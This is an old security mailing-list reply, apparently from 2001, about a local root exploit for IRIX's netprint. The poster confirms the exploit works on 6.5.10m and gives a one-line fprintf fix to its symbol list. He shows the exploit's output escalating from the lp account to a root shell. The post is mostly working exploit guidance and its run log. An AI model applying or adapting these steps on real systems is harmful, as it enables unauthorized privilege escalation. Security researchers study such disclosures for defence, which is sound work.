Re: IRIX /usr/lib/print/netprint local root symbols exploit.

From: Thomas-Martin Kruel (kruel@mbi-berlin.de)
Date: Sat Apr 28 2001 - 09:37:02 PDT


    I tested against 6.5.10m and it works.
    
    Just add
    
     fprintf(symbol,"void ListAllPrinters(){}\n");
    
    to the list of symbols and execute the xploit as user "lp":
    
    % whoami
    lp
    % ./xnetprint /bin/sh
    [(IRIX)netprint[] local root exploit, by: v9[v9at_private]. ]
    [*] making symbols source file for netprint to execute.
    [*] done, now compiling symbols source file.
    [*] done, now checking to see if the symbols source compiled.
    [*] done, now executing netprint.
    [*] success, uid: 0, euid: 0, gid: 0, egid: 0.
    # whoami
    root
    
    
    The "lp" account, however, is no longer left open by default since 6.5, AFAIK.
    
    Thomas.
    
    ---
    Max-Born-Institut fuer Nichtlineare Optik und Kurzzeitspektroskopie
    Max-Born-Strasse 2A, D-12489 Berlin, Germany
    Leiter EDV - Thomas-Martin Kruel
       mailto: kruel@mbi-berlin.de    Tel. 030 / 6392-1540, Fax: -1509, Funk: 0170 / 9247486
    Support: http://www.mbi-berlin.de/edv
       mailto: support@mbi-berlin.de  Tel. 030 / 6392-1555, Pager: alarm@mbi-berlin.de
    


